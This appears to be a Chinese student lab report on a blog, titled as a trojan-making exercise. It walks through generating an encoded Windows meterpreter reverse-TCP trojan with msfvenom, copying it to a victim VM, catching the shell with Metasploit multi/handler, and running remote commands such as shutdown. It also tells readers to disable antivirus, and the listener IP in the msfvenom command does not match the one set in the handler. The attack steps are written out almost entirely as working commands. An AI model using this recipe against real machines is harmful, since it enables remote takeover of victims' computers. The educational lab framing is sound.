木马病毒制作及分析

  • 实验目的

本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容:

(1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击;

(2) 利用网络安全工具或设备对入侵与攻击进行检测;

注意事项

1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。

2.若在个人电脑上实验,最好在虚拟机中运行。

3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。

4.请勿传播该木马。传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。

  • 实验要求

Windows系统 、kalilinux系统、vmware等

  • 实验内容

    利用kali 生成木马并执行,攻击机kali的ip地址192.168.6.50 ,受害机的server ip地址192.168.6.100.

   参考如图:

    

四、实验步骤

1、使用kali生成木马,木马程序名nxlgwg.exe

   root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.43.25  LPORT=4444  -f  exe > nxlgwg.exe

操作截图

检查/root/目录下是否生成木马

操作截图

 

2、将生成的木马程序名拷贝到受害机上 (方法很多,可以使用putty或者WISCP)也可利用虚拟与主机之间可以复制文件进行文件copy。

操作截图

将其拷贝出来,将其复制到server主机之上。

3、在kali系统中实施攻击,调用MSF工具进行攻击

打开 Metasploit 工具,直接搜索即可。

参照上图选择工具

然后依次输入以下命令

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.6.50
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

 

输入shell 等待受害机点击木马

操作截图

  1. 确认受害机被远程控制

通过 kail 进行攻击   

 在受害机桌面上建立文件夹(使用mkdir命令建立任一文件夹)

操作截图

 

对受害机进行设定60秒关机操作(shutdown –s –t 60)

  

取消关机操作 shutdown –a

核查受害机的任务进程,确认木马正在运行

操作截图

核查受害机当前端口打开情况(使用netstat 命令检查4444端口被打开)

操作截图

  • 15
    点赞
  • 132
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值